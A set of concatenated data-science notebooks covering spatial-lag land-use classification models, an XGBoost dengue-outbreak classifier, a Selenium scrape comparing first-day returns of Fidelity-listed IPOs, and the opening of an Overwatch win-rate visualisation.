Block Split lag`[TBA]` Interaction variables Here we develop a set of interaction variables between the probability of each class and their spatial lag. In mathematical terms, the expected probability $\mu_i$ for chip $i$ in our base model is:$$\mu_i = \alpha + \sum_k P_{ki} \beta_k$$When we include the spatial lag, this becomes:$$\mu_i = \alpha + \sum_k P_{ki} \beta_k + \sum_k WP_{ki} \gamma_k$$The idea with interactions is to model the probability expectation as:$$\mu_i = \alpha + \sum_k P_{ki} \beta_k + \sum_k WP_{ki} \gamma_k + \sum_k \sum_k P_{ki} \times WP_{ki} \delta_{kk}$$ Here we build a method to construct the last term in the equation above ($\sum_k \sum_k P_{ki} \times WP_{ki}$), which will be used when fitting some of the models below: Build `db` Finally, we bring together in a single, clean table information on the original probabilities, their spatial lags, and class label. To make sure it is analysis-ready, we retain only single-class chips that are _not_ islands (i.e., have at least one neighbor).
###Code
db = db_all.join(
lag_all
).query(
'(single_class == True) & (island == False)'
).drop(['single_class', 'island'], axis=1)
###Output
_____no_output_____
###Markdown
The dropping of observations that happened above might also induce additional biases.**DA-B** Explore further the distribution of values between train/val sets (e.g. heatmaps/hists before the split and after) Extract train/val indices Now we have the set ready, we can pick out train/val indices as the modeling will expect them.
###Code
train_ids = db.query('train_all == True').index
val_ids = db.query('train_all == False').index
###Output
_____no_output_____
###Markdown
Class (im)balance The spatial lag step might be introducing bias in the sample before modelling. We pick all the single class chips and split them randomly between train and validation. If spatially lagging has a systematic effect on some classes (e.g., some classes get dropped more often), this might introduce bias that will make our model scoress unreliable. To explore this case, we want to get an idea of:- [x] Overall proportion of train/val before (`db_all` single class) and after spatially lagging (`db`)
###Code
pandas.DataFrame(
{
'before_lag': db_all.query('single_class').value_counts(
'train_all'
) * 100 / len(db_all.query('single_class')),
'after_lag': db.value_counts('train_all') * 100 / len(db)
}
).rename({True: 'Training', False: 'Validation'})
###Output
_____no_output_____
###Markdown
- [x] Poportion by class in the set before spatially lagging and after --> `Fig. Balance (b)`
###Code
props = pandas.DataFrame(
{
'before_lag': pandas.value_counts(
db_all.query('single_class')['label']
) * 100 / len(db_all.query('single_class')),
'after_lag': pandas.value_counts(
db['label']
) * 100 / len(db['label'])
}
)
p = props.reindex(tools.class_names).plot.bar(figsize=(9, 3), title='Fig. Balance (b)')
p.set_xticklabels(p.get_xticklabels(), rotation = 45, ha="right");
###Output
_____no_output_____
###Markdown
Single class models Models to evaluate:| Algorithm / Features | Baseline | Baseline + $WX$ | Baseline + $WX$ + $X\times WX$ ||----------------------|----------|-----------------|-----------------|| Max. Prob | `mp_res` | N/A | N/A || Logit ensemble | `logite_baseline_res` | `logite_wx_res` | Singular matrix || MNLogit | Does not converge | Does not converge | - || Random Forest | `rf_baseline_res` | `rf_wx_res` | N/A || XGBoost | `hbgb_baseline_res` | `hbgb_wx_res` | N/A |Evaluation workflow:1. Split train/validation randomly (e.g., 70/30)1. Fit model on train subset1. Obtain `perf_` measures on validation subset1. Fill `results.json` fileFormat:```json{ "meta_n_class": , "meta_class_names": , "meta_trainval_counts": "model_name": , "model_params": , "meta_runtime": , "meta_preds_path": , "perf_model_accuracy_train": , "perf_within_class_accuracy_train": , "perf_confusion_train": , "perf_model_accuracy_val": , "perf_within_class_accuracy_val": , "perf_confusion_val": , "notes": ,}```
###Code
res_path = '/home/jovyan/data/model_outputs/'
###Output
_____no_output_____
###Markdown
Flush `db` to disk for availability later on:
###Code
db.to_parquet(os.path.join(res_path, 'db.pq'))
###Output
/tmp/ipykernel_2134/473553071.py:1: UserWarning: this is an initial implementation of Parquet/Feather file support and associated metadata. This is tracking version 0.1.0 of the metadata specification at https://github.com/geopandas/geo-arrow-spec
This metadata specification does not yet make stability promises. We do not yet recommend using this in a production setting unless you are able to rewrite your Parquet/Feather files.
To further ignore this warning, you can do:
import warnings; warnings.filterwarnings('ignore', message='.*initial implementation of Parquet.*')
db.to_parquet(os.path.join(res_path, 'db.pq'))
###Markdown
Max. Probability This is a baseline that selects as predicted category that which displays the highest probability as stored in `probs`. We can consider this the baseline upon which other models will improve.
###Code
mp_res = tools.run_maxprob(
tools.class_names, 'label', db, train_ids, val_ids, 'baseline', res_path
)
###Output
_____no_output_____
###Markdown
Logit ensemble Our approach here consists on fitting individual logistic regressions to predict each class against all other ones. With these models, we obtain a probability for each class, and pick that with the largest one as the predicted class.---**NOTE (DA-B)**: this might not be right if different logits have different distribution of probabilities. Maybe replace the probability by the rank and pick the largest rank as the predicted class?---Two methods, `logite_fit` to fit each class model, and `logite_predict` to generate predicted classes from set of arbitrary features. Baseline
###Code
from importlib import reload
reload(tools);
logite_baseline_res = tools.run_logite(
tools.class_names, 'label', db, train_ids, val_ids, 'baseline', res_path
)
###Output
/opt/conda/lib/python3.9/site-packages/sklearn/preprocessing/_data.py:258: UserWarning: Numerical issues were encountered when scaling the data and might not be solved. The standard deviation of the data is probably very close to 0.
warnings.warn(
###Markdown
Baseline + $WX$
###Code
logite_wx_res = tools.run_logite(
tools.class_names + w_class_names,
'label',
db,
train_ids,
val_ids,
'baseline_wx',
res_path
)
###Output
Optimization terminated successfully.
Current function value: 0.657119
Iterations 6
Optimization terminated successfully.
Current function value: 0.604344
Iterations 6
Optimization terminated successfully.
Current function value: 0.676905
Iterations 5
Optimization terminated successfully.
Current function value: 0.692461
Iterations 4
Optimization terminated successfully.
Current function value: 0.692309
Iterations 4
Optimization terminated successfully.
Current function value: 0.668075
Iterations 6
Optimization terminated successfully.
Current function value: 0.692096
Iterations 4
Optimization terminated successfully.
Current function value: 0.687466
Iterations 4
Optimization terminated successfully.
Current function value: 0.692777
Iterations 4
Optimization terminated successfully.
Current function value: 0.693107
Iterations 3
Optimization terminated successfully.
Current function value: 0.693127
Iterations 3
Optimization terminated successfully.
Current function value: 0.684861
Iterations 4
###Markdown
Baseline + $WX$ + $X\times WX$
###Code
logite_xwx_res = tools.run_logite(
tools.class_names + w_class_names,
'label',
db,
train_ids,
val_ids,
'baseline_wx_xwx',
'model_results/',
scale_x=False,
log_x=True,
interact=(tools.class_names, w_class_names)
)
###Output
_____no_output_____
###Markdown
Multinomial Logit For this we rely on `statsmodels` [implementation](https://www.statsmodels.org/stable/examples/notebooks/generated/discrete_choice_overview.htmlMultinomial-Logit) and fit it to the standardised log of the original probabilities to make convergence possible:
###Code
X_train = pandas.DataFrame(
scale(np.log1p(db.loc[train_ids, class_names+w_class_names])), train_ids, class_names+w_class_names
)
t0 = time()
mlogit_mod = sm.MNLogit(db.loc[train_ids, 'label'], X_train)
mlogit_res = mlogit_mod.fit()
from importlib import reload
reload(tools);
###Output
_____no_output_____
###Markdown
Baseline
###Code
mlogit_res = tools.run_mlogit(
tools.class_names, 'label', db, train_ids, val_ids, 'baseline', 'model_results/'
)
###Output
/opt/conda/lib/python3.9/site-packages/sklearn/preprocessing/_data.py:235: UserWarning: Numerical issues were encountered when centering the data and might not be solved. Dataset may contain too large values. You may need to prescale your features.
warnings.warn(
/opt/conda/lib/python3.9/site-packages/sklearn/preprocessing/_data.py:254: UserWarning: Numerical issues were encountered when scaling the data and might not be solved. The standard deviation of the data is probably very close to 0.
warnings.warn(
/opt/conda/lib/python3.9/site-packages/statsmodels/discrete/discrete_model.py:2299: RuntimeWarning: overflow encountered in exp
eXB = np.column_stack((np.ones(len(X)), np.exp(X)))
/opt/conda/lib/python3.9/site-packages/statsmodels/discrete/discrete_model.py:2300: RuntimeWarning: invalid value encountered in true_divide
return eXB/eXB.sum(1)[:,None]
###Markdown
Baseline + $WX$
###Code
mlogit_wx = tools.run_mlogit(
tools.class_names + w_class_names,
'label',
db,
train_ids,
val_ids,
'baseline',
'model_results/'
)
###Output
_____no_output_____
###Markdown
Random Forest
###Code
rf_param_grid = {
'n_estimators': [150],
'max_depth': [5],
'max_features': [0.25, 'sqrt']
}
rf_param_grid = {
'n_estimators': [50, 100, 150, 200, 300],
'max_depth': [5, 10, 20, 30, None],
'max_features': [0.25, 0.5, 0.75, 1, 'sqrt', 'log2']
}
###Output
_____no_output_____
###Markdown
Baseline - Grid search
###Code
%%time
grid = GridSearchCV(
RandomForestClassifier(),
rf_param_grid,
scoring='accuracy',
cv=5,
n_jobs=-1
)
grid.fit(
db.query('train_all')[tools.class_names],
db.query('train_all')['label']
)
pandas.DataFrame(grid.cv_results_).to_csv(
os.path.join(res_path, 'RandomForestClassifier_baseline.csv')
)
print(grid.best_params_)
###Output
/opt/conda/lib/python3.9/site-packages/joblib/externals/loky/process_executor.py:702: UserWarning: A worker stopped while some jobs were given to the executor. This can be caused by a too short worker timeout or by a memory leak.
warnings.warn(
###Markdown
- Model fitting
###Code
rf_baseline_res = tools.run_tree(
tools.class_names,
'label',
db,
train_ids,
val_ids,
RandomForestClassifier(**grid.best_params_),
'baseline',
res_path
)
###Output
_____no_output_____
###Markdown
Baseline + $WX$ - Grid search
###Code
%%time
grid = GridSearchCV(
RandomForestClassifier(),
rf_param_grid,
scoring='accuracy',
cv=5,
n_jobs=-1
)
grid.fit(
db.query('train_all')[tools.class_names + w_class_names],
db.query('train_all')['label']
)
pandas.DataFrame(grid.cv_results_).to_csv(
os.path.join(res_path, 'RandomForestClassifier_baseline_wx.csv')
)
print(grid.best_params_)
###Output
/opt/conda/lib/python3.9/site-packages/joblib/externals/loky/process_executor.py:702: UserWarning: A worker stopped while some jobs were given to the executor. This can be caused by a too short worker timeout or by a memory leak.
warnings.warn(
###Markdown
- Model fitting
###Code
rf_wx_res = tools.run_tree(
tools.class_names + w_class_names,
'label',
db,
train_ids,
val_ids,
RandomForestClassifier(**grid.best_params_),
'baseline_wx',
res_path
)
###Output
_____no_output_____
###Markdown
Histogram-Based Gradient Boosting See [documentation](https://scikit-learn.org/stable/modules/ensemble.htmlhistogram-based-gradient-boosting) for the meaning and approaches to the hyper-parameters.
###Code
hbgb_param_grid = {
'max_iter': [50],
'learning_rate': [0.01, 0.05],
'max_depth': [30, None],
}
hbgb_param_grid = {
'max_iter': [50, 100, 150, 200, 300],
'learning_rate': [0.01, 0.05] + np.linspace(0, 1, 11)[1:].tolist(),
'max_depth': [5, 10, 20, 30, None],
}
###Output
_____no_output_____
###Markdown
Baseline - Grid search:
###Code
%%time
grid = GridSearchCV(
HistGradientBoostingClassifier(),
hbgb_param_grid,
scoring='accuracy',
cv=5,
n_jobs=-1
)
grid.fit(
db.query('train_all')[tools.class_names], db.query('train_all')['label']
)
pandas.DataFrame(grid.cv_results_).to_csv(
os.path.join(res_path, 'HistGradientBoostingClassifier_baseline.csv')
)
print(grid.best_params_)
###Output
_____no_output_____
###Markdown
- Model fitting
###Code
hbgb_baseline_res = tools.run_tree(
tools.class_names,
'label',
db,
train_ids,
val_ids,
HistGradientBoostingClassifier(**grid.best_params_),
'baseline',
res_path
)
###Output
_____no_output_____
###Markdown
Baseline + $WX$ - Grid search:
###Code
%%time
grid = GridSearchCV(
HistGradientBoostingClassifier(),
hbgb_param_grid,
scoring='accuracy',
cv=5,
n_jobs=-1
)
grid.fit(
db.query('train_all')[tools.class_names + w_class_names],
db.query('train_all')['label']
)
pandas.DataFrame(grid.cv_results_).to_csv(
os.path.join(res_path, 'HistGradientBoostingClassifier_baseline_wx.csv')
)
print(grid.best_params_)
###Output
_____no_output_____
###Markdown
- Model fitting
###Code
hbgb_wx_res = tools.run_tree(
tools.class_names + w_class_names,
'label',
db,
train_ids,
val_ids,
HistGradientBoostingClassifier(max_iter=100),
'baseline_wx',
res_path
)
###Output
_____no_output_____
###Markdown
---**NOTE** - As of April 21st'22, standard gradient-boosted trees are deprecated due to their long training time and similar performance with histogram-based ones. Gradient Tree Boosting See [documentation](https://scikit-learn.org/stable/modules/ensemble.htmlgradient-boosting) for the meaning and approaches to the hyper-parameters (mostly `n_estimators` and `learning_rate`). Baseline
###Code
gbt_baseline_res = run_tree(
class_names,
'label',
db,
train_ids,
val_ids,
GradientBoostingClassifier(n_estimators=50, learning_rate=1.),
'baseline',
'model_results/'
)
###Output
_____no_output_____
###Markdown
Baseline + $WX$
###Code
gbt_baseline_res = run_tree(
class_names + w_class_names,
'label',
db,
train_ids,
val_ids,
GradientBoostingClassifier(n_estimators=50, learning_rate=1.),
'baseline_wx',
'model_results/'
)
###Output
_____no_output_____ |
V1_classification_exercise_XGBoost_Bhav_DengueAI_Project.ipynb | ###Markdown
###Code
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
#https://www.drivendata.org/competitions/44/dengai-predicting-disease-spread/page/80/
#Your goal is to predict the total_cases label for each (city, year, weekofyear) in the test set.
#Performance metric = mean absolute error
###Output
_____no_output_____
###Markdown
LIST OF FEATURES:You are provided the following set of information on a (year, weekofyear) timescale:(Where appropriate, units are provided as a _unit suffix on the feature name.)City and date indicators1. city – City abbreviations: sj for San Juan and iq for Iquitos2. week_start_date – Date given in yyyy-mm-dd formatNOAA's GHCN daily climate data weather station measurements1. station_max_temp_c – Maximum temperature2. station_min_temp_c – Minimum temperature3. station_avg_temp_c – Average temperature4. station_precip_mm – Total precipitation5. station_diur_temp_rng_c – Diurnal temperature rangePERSIANN satellite precipitation measurements (0.25x0.25 degree scale)6. precipitation_amt_mm – Total precipitationNOAA's NCEP Climate Forecast System Reanalysis measurements (0.5x0.5 degree scale)7. reanalysis_sat_precip_amt_mm – Total precipitation8. reanalysis_dew_point_temp_k – Mean dew point temperature9. reanalysis_air_temp_k – Mean air temperature10. reanalysis_relative_humidity_percent – Mean relative humidity11. reanalysis_specific_humidity_g_per_kg – Mean specific humidity12. reanalysis_precip_amt_kg_per_m2 – Total precipitation13. reanalysis_max_air_temp_k – Maximum air temperature14. reanalysis_min_air_temp_k – Minimum air temperature15. reanalysis_avg_temp_k – Average air temperature16. reanalysis_tdtr_k – Diurnal temperature rangeSatellite vegetation - Normalized difference vegetation index (NDVI) - NOAA's CDR Normalized Difference Vegetation Index (0.5x0.5 degree scale) measurements17. ndvi_se – Pixel southeast of city centroid18. ndvi_sw – Pixel southwest of city centroid19. ndvi_ne – Pixel northeast of city centroid20. ndvi_nw – Pixel northwest of city centroid TARGET VARIABLE = total_cases label for each (city, year, weekofyear)
###Code
import sys
#Load train features and labels datasets
train_features = pd.read_csv('https://s3.amazonaws.com/drivendata/data/44/public/dengue_features_train.csv')
train_features.head()
train_features.shape
train_labels = pd.read_csv('https://s3.amazonaws.com/drivendata/data/44/public/dengue_labels_train.csv')
train_labels.head()
train_labels.shape
#Merge train features and labels datasets
train = pd.merge(train_features, train_labels)
train.head()
train.shape
#city, year and week of year columns are duplicate in train_features and train_labels datasets so the total_cases column is added to the features dataset
train.dtypes
train['total_cases'].describe()
dengue_cases = train['total_cases']
dengue_cases
np.percentile(dengue_cases, 95)
#Thus, we can isolate a column with total_cases >81.25 as dengue outbreaks as they represent >2 S.D or > 95 percentile
#create a new column 'dengue_outbreak' with total_cases >81.25 and drop total_cases column
train['dengue_outbreak'] = train['total_cases'] > 81.25
#Can do Pandas profiling here
#Do train, val split
from sklearn.model_selection import train_test_split
train, val = train_test_split(train, train_size=0.80, test_size=0.20,
stratify=train['dengue_outbreak'],
random_state=42, )
train.shape, val.shape
#Baseline statistics for the target variable total_cases in train dataset
train['dengue_outbreak'].value_counts(normalize=True)
#Thus, dengue outbreaks occur only in 4.98% of cases in train dataset and are minority class
#we need to convert week_start_date to numeric form uisng pd.to_dateime function
#wrangle function
def wrangle(X):
X = X.copy()
# Convert week_start_date to numeric form
X['week_start_date'] = pd.to_datetime(X['week_start_date'], infer_datetime_format=True)
# Extract components from date_recorded, then drop the original column
X['year_recorded'] = X['week_start_date'].dt.year
X['month_recorded'] = X['week_start_date'].dt.month
#X['day_recorded'] = X['week_start_date'].dt.day
X = X.drop(columns='week_start_date')
X = X.drop(columns='year')
#I engineered few features which represent standing water, high risk feature for mosquitos
X['standing water feature 1'] = X['station_precip_mm'] / X['station_max_temp_c']
X['total satellite vegetation index of city'] = X['ndvi_se'] + X['ndvi_sw'] + X['ndvi_ne'] + X['ndvi_nw']
#2. standing water feature 2 = 'NOAA GCN precipitation amount in kg per m2 reanalyzed' * (total vegetation, sum of all 4 parts of the city)
X['standing water feature 2'] = X['reanalysis_precip_amt_kg_per_m2'] * X['total satellite vegetation index of city']
#3. standing water feature 3: 'NOAA GCN precipitation amount in kg per m2 reanalyzed'} * 'NOAA GCN mean relative humidity in pct reanalyzed'}
X['standing water feature 3'] = X['reanalysis_precip_amt_kg_per_m2'] * X['reanalysis_relative_humidity_percent']
#4. standing water feature 4: 'NOAA GCN precipitation amount in kg per m2 reanalyzed'} * 'NOAA GCN mean relative humidity in pct reanalyzed'} * (total vegetation)
X['standing water feature 4'] = X['reanalysis_precip_amt_kg_per_m2'] * X['reanalysis_relative_humidity_percent'] * X['total satellite vegetation index of city']
# 5. standing water feature 5: 'NOAA GCN precipitation amount in kg per m2 reanalyzed'} / 'NOAA GCN max air temp reanalyzed'
X['standing water feature 5'] = X['reanalysis_precip_amt_kg_per_m2'] / X['reanalysis_max_air_temp_k']
#6. standing water feature 6 (most imp): ['NOAA GCN precipitation amount in kg per m2 reanalyzed'} * 'NOAA GCN mean relative humidity in pct reanalyzed'} * (total vegetation)]/['NOAA GCN max air temp reanalyzed']
X['standing water feature 6'] = X['reanalysis_precip_amt_kg_per_m2'] * X['reanalysis_relative_humidity_percent'] * X['total satellite vegetation index of city'] / X['reanalysis_max_air_temp_k']
#Rename columns
X.rename(columns= {'reanalysis_air_temp_k':'Mean air temperature in K'}, inplace=True)
X.rename(columns= {'reanalysis_min_air_temp_k':'Minimum air temperature in K'}, inplace=True)
X.rename(columns= {'weekofyear':'Week of Year'}, inplace=True)
X.rename(columns= {'station_diur_temp_rng_c':'Diurnal temperature range in C'}, inplace=True)
X.rename(columns= {'reanalysis_precip_amt_kg_per_m2':'Total precipitation kg/m2'}, inplace=True)
X.rename(columns= {'reanalysis_tdtr_k':'Diurnal temperature range in K'}, inplace=True)
X.rename(columns= {'reanalysis_max_air_temp_k':'Maximum air temperature in K'}, inplace=True)
X.rename(columns= {'year_recorded':'Year recorded'}, inplace=True)
X.rename(columns= {'reanalysis_relative_humidity_percent':'Mean relative humidity'}, inplace=True)
X.rename(columns= {'month_recorded':'Month recorded'}, inplace=True)
X.rename(columns= {'reanalysis_dew_point_temp_k':'Mean dew point temp in K'}, inplace=True)
X.rename(columns= {'precipitation_amt_mm':'Total precipitation in mm'}, inplace=True)
X.rename(columns= {'station_min_temp_c':'Minimum temp in C'}, inplace=True)
X.rename(columns= {'ndvi_se':'Southeast vegetation index'}, inplace=True)
X.rename(columns= {'ndvi_ne':'Northeast vegetation index'}, inplace=True)
X.rename(columns= {'ndvi_nw':'Northwest vegetation index'}, inplace=True)
X.rename(columns= {'ndvi_sw':'Southwest vegetation index'}, inplace=True)
X.rename(columns= {'reanalysis_avg_temp_k':'Average air temperature in K'}, inplace=True)
X.rename(columns= {'reanalysis_sat_precip_amt_mm':'Total precipitation in mm 2'}, inplace=True)
X.rename(columns= {'reanalysis_specific_humidity_g_per_kg':'Mean specific humidity'}, inplace=True)
X.rename(columns= {'station_avg_temp_c':'Average temp in C'}, inplace=True)
X.rename(columns= {'station_max_temp_c':'Maximum temp in C'}, inplace=True)
X.rename(columns= {'station_precip_mm':'Station precipitation in mm'}, inplace=True)
X = X.drop(columns='total_cases')
X = X.drop(columns='Total precipitation in mm 2')
# return the wrangled dataframe
return X
train = wrangle(train)
val = wrangle(val)
train.head().T
#Define target and features
# The status_group column is the target
target = 'dengue_outbreak'
# Get a dataframe with all train columns except the target
train_features = train.drop(columns=[target])
# Get a list of the numeric features
numeric_features = train_features.select_dtypes(include='number').columns.tolist()
# Get a series with the cardinality of the nonnumeric features
cardinality = train_features.select_dtypes(exclude='number').nunique()
# Get a list of all categorical features with cardinality <= 50
categorical_features = cardinality[cardinality <= 50].index.tolist()
# Combine the lists
features = numeric_features + categorical_features
# Arrange data into X features matrix and y target vector
X_train = train[features]
y_train = train[target]
X_val = val[features]
y_val = val[target]
pip install category_encoders
from sklearn.pipeline import make_pipeline
import category_encoders as ce
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import OneHotEncoder
import xgboost as xgb
from xgboost import XGBClassifier
from sklearn import model_selection, preprocessing
processor = make_pipeline(
ce.OneHotEncoder(use_cat_names=True),
SimpleImputer(strategy='median')
)
X_train_processed = processor.fit_transform(X_train)
X_val_processed = processor.transform(X_val)
model = XGBClassifier(n_estimators=200, eval_metric='auc', n_jobs=-1)
eval_set = [(X_train_processed, y_train),
(X_val_processed, y_val)]
model.fit(X_train_processed, y_train, eval_set=eval_set, eval_metric='auc',
early_stopping_rounds=10)
results = model.evals_result()
train_error = results['validation_0']['auc']
val_error = results['validation_1']['auc']
iterations = range(1, len(train_error) + 1)
plt.figure(figsize=(10,7))
plt.plot(iterations, train_error, label='Train')
plt.plot(iterations, val_error, label='Validation')
plt.title('XGBoost Validation Curve')
plt.ylabel('AUC')
plt.xlabel('Model Complexity (n_estimators)')
plt.legend();
#Validation accuracy
model.score(X_val_processed, y_val)
#predict on X_val
y_pred = model.predict(X_val_processed)
# Predicted probabilities for positive class
y_pred_proba = model.predict_proba(X_val_processed)[:, 1] # Probability for positive class
from sklearn.metrics import roc_auc_score
roc_auc_score(y_val, y_pred_proba)
#ROC-AUC score for positive class i.e dengue outbreak = 74.3%
# Compute the confusion_matrix
from sklearn.metrics import confusion_matrix
confusion_matrix(y_val, y_pred)
pip install scikit-plot
import scikitplot as skplt
skplt.metrics.plot_confusion_matrix(y_val, y_pred,
figsize=(8,6),
title=f'Confusion Matrix (n={len(y_val)})',
normalize=False);
# Predicted probabilities for positive class
y_pred_proba2 = model.predict_proba(X_val_processed)[:, 1] # Probability for positive class
from sklearn.metrics import roc_curve
fpr, tpr, thresholds = roc_curve(y_val, y_pred_proba2)
# See the results in a table
pd.DataFrame({
'False Positive Rate': fpr,
'True Positive Rate': tpr,
'Threshold': thresholds
})
# See the results on a plot.
# This is the "Receiver Operating Characteristic" curve
plt.scatter(fpr, tpr)
plt.title('ROC curve')
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate');
# Use scikit-learn to calculate the area under the curve.
from sklearn.metrics import roc_auc_score
roc_auc_score(y_val, y_pred_proba2)
#Eli5 Permutation Importance Plot showing weights
pip install eli5
import eli5
from eli5.sklearn import PermutationImportance
#Eli5 needs ordinal encoding
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(strategy='median')
)
X_train_transformed = pipeline.fit_transform(X_train)
X_val_transformed = pipeline.transform(X_val)
model = XGBClassifier(n_estimators=5, eval_metric='auc', n_jobs=-1)
model.fit(X_train_transformed, y_train)
permuter = PermutationImportance(
model,
scoring= 'accuracy',
n_iter=5,
random_state=42
)
permuter.fit(X_val_transformed, y_val)
permuter.feature_importances_
eli5.show_weights(
permuter,
top=None,
feature_names=X_val.columns.tolist()
)
###Output
_____no_output_____ |
Fidelity Research/Fidelity-IPO.ipynb | ###Markdown
First Day Returns of IPOs offered on Fidelity Installs used packages
###Code
!pip install selenium
!pip install pandas
!pip install numpy
###Output
zsh:1: command not found: pip
zsh:1: command not found: pip
zsh:1: command not found: pip
###Markdown
Imports used packages
###Code
import time
import json
import pandas as pd
import numpy as np
###Output
_____no_output_____
###Markdown
Removes DataFrame size limits
###Code
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
###Output
_____no_output_____
###Markdown
Credit Suisse IPOs Webscrapes Fidelity.com
###Code
from selenium import webdriver
PATH = '/home/jp/Python/chromedriver'
driver = webdriver.Chrome(PATH)
url = 'https://www.fidelity.com/stock-trading/previous-year-ipos'
driver.get(url)
driver.maximize_window()
ipos = []
for year in range(1996,2021):
table = driver.find_element_by_xpath("//*[@id='{}']/table".format(year))
for row in table.find_elements_by_xpath(".//tr"):
ipo = [td.text for td in row.find_elements_by_xpath(".//td")]
if year < 2016:
if (ipo != []) and (ipo[5] == 'IPO' ) and ('Credit Suisse' in ipo[6]):
ipos.append(ipo)
elif year > 2015:
if (ipo != []) and (ipo[4] == 'IPO' ) and ('Credit Suisse' in ipo[5]):
ipos.append(ipo)
with open('fidelity-credit_suisse-IPOs.json', 'w+') as f:
json.dump(ipos, f)
driver.close()
###Output
_____no_output_____
###Markdown
Creates DataFrame of Fidelity IPOs
###Code
with open('fidelity-credit_suisse-IPOs.json', 'rb') as f:
data = json.load(f)
ipos = {
'Date':[],
'Issuer':[],
'Symbol':[],
'Managers':[],
'Access Bookmaker':[],
'Offer Price':[]
}
for ipo in data:
ipos['Issuer'].append(ipo[0])
ipos['Date'].append(ipo[1])
ipos['Offer Price'].append(float(ipo[2][1:]))
ipos['Symbol'].append(ipo[3].strip())
if int(ipo[1][-2:]) > 15:
ipos['Managers'].append(ipo[5])
ipos['Access Bookmaker'].append(ipo[6])
else:
ipos['Managers'].append(ipo[6])
ipos['Access Bookmaker'].append("Nan")
fid = pd.DataFrame(ipos)
fid
###Output
_____no_output_____
###Markdown
Create DataFrame from IPO Scoop XLS
###Code
file = 'ipos_excel.csv'
scoop = pd.read_csv(file)
scoop['1st Day % Chg'] = ((scoop['1st Day Close'] - scoop['Offer Price']) / scoop['Offer Price'])
scoop.replace([np.inf, -np.inf], np.nan, inplace=True)
scoop.dropna(inplace=True)
###Output
_____no_output_____
###Markdown
IPOs that are on Fidelity site but not IPO Scoop
###Code
fid[fid['Symbol'].isin(scoop['Symbol'])==False]
###Output
_____no_output_____
###Markdown
Fidelity IPOs with Open and Close Data from ScoopNote: There are duplicates?
###Code
fid_ipos = scoop[scoop['Symbol'].isin(fid['Symbol'])==True]
fid_ipos = fid_ipos[fid_ipos['Managers'].str.contains('Credit Suisse')==True]
fid_ipos
###Output
_____no_output_____
###Markdown
Credit Suisse IPOs that are on IPO Scoop but not Fidelity Note: Some rows on IPO Scoop excel do not list Credit Suisse as manager however said IPO is on Fidelity site
###Code
scoop_only = scoop[scoop['Symbol'].isin(fid['Symbol'])==False]
scoop_only = scoop_only[scoop_only['Managers'].str.contains('Credit Suisse')==True]
scoop_only = scoop_only[scoop_only['Symbol'].str.contains('.U')==False]
scoop_only = scoop_only[scoop_only['Issuer'].str.contains('Acquisition')==False]
scoop_only
scoop_only.to_csv('Credit_Suisee_IPOs_not_on_Fidelity.csv')
fid_ipos.to_csv('Credit_Suisse_IPOs_on_Fidelity.csv')
###Output
_____no_output_____
###Markdown
Mean of 1st Day Close % Chg of IPOs
###Code
non_fid_return = round(np.asarray(scoop_only['1st Day % Chg'], dtype=np.float).mean()*100,3)
fid_return = round(np.asarray(fid_ipos['1st Day % Chg'], dtype=np.float).mean()*100,3)
non_fid_return, fid_return
###Output
_____no_output_____
###Markdown
ALL IPOs (Not just Credit Suisse) Webscrapes Fidelity for all IPOs
###Code
from selenium import webdriver
PATH = '/home/jp/Python/chromedriver'
driver = webdriver.Chrome(PATH)
url = 'https://www.fidelity.com/stock-trading/previous-year-ipos'
driver.get(url)
driver.maximize_window()
ipos = []
for year in range(1996,2021):
table = driver.find_element_by_xpath("//*[@id='{}']/table".format(year))
for row in table.find_elements_by_xpath(".//tr"):
ipo = [td.text for td in row.find_elements_by_xpath(".//td")]
if year < 2016:
if (ipo != []) and (ipo[5] == 'IPO' ):
ipos.append(ipo)
elif year > 2015:
if (ipo != []) and (ipo[4] == 'IPO' ):
ipos.append(ipo)
with open('fidelity-IPOs.json', 'w+') as f:
json.dump(ipos, f)
driver.close()
###Output
_____no_output_____
###Markdown
Creates DataFrame
###Code
with open('fidelity-IPOs.json', 'rb') as f:
data = json.load(f)
ipos = {
'Date':[],
'Issuer':[],
'Symbol':[],
'Managers':[],
'Offer Price':[]
}
for ipo in data:
ipos['Issuer'].append(ipo[0])
ipos['Date'].append(ipo[1])
ipos['Offer Price'].append(float(ipo[2][1:]))
ipos['Symbol'].append(ipo[3].strip())
if int(ipo[1][-2:]) > 15:
ipos['Managers'].append(ipo[5])
else:
ipos['Managers'].append(ipo[6])
fid_all = pd.DataFrame(ipos)
###Output
_____no_output_____
###Markdown
Creates DataFrame of Fidelity IPOs
###Code
all_fid_ipos = scoop[scoop['Symbol'].isin(fid_all['Symbol'])==True]
all_fid_ipos.head()
###Output
_____no_output_____
###Markdown
Creates DataFrame of IPOs not on Fidelity
###Code
scoop_only_all = scoop[scoop['Symbol'].isin(fid_all['Symbol'])==False]
scoop_only_all = scoop_only_all[scoop_only_all['Symbol'].str.contains('.U')==False]
scoop_only_all = scoop_only_all[scoop_only_all['Issuer'].str.contains('Acquisition')==False]
scoop_only_all
###Output
_____no_output_____
###Markdown
Mean of 1st Day Close % Chg of IPOs
###Code
non_fid_return_all = round(np.asarray(scoop_only_all['1st Day % Chg'], dtype=np.float).mean()*100,3)
fid_return_all = round(np.asarray(all_fid_ipos['1st Day % Chg'], dtype=np.float).mean()*100,3)
non_fid_return_all, fid_return_all
###Output
_____no_output_____ |
Part 2_DATA VISUALIZATION (GAMING STATS).ipynb | ###Markdown
Python group project - ipynb n°2 - Visualization of data 1. Visualisation of win rates of each class of Hero, for levels : bronze gold and grandmaster The objective here is to find out graphically if the level influences the victory rate (which is a victory rate of the team) and if it is the same for all hero classes. We limit ourselves to Bronze (level 1), Gold (level 3) and GrandMaster (level 6).
###Code
# 0. import libraries #
import pandas
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import matplotlib.patches as mpatches
plt.rcParams["figure.figsize"] = (5,8)
# 1. Read in a CSV file #
dataset = pandas.read_csv("overbuff.csv", encoding = "latin1")
# 2. keep only role, rank, and win_rate #
df0 = dataset[['Role','Rank', 'Win_rate']]
# 3. mean the win_rate for Role & Rank #
df1 = df0.groupby(['Role', 'Rank']).mean()
# 4. Create index for Levels and Roles #
df2 = df1.index.get_level_values(1)
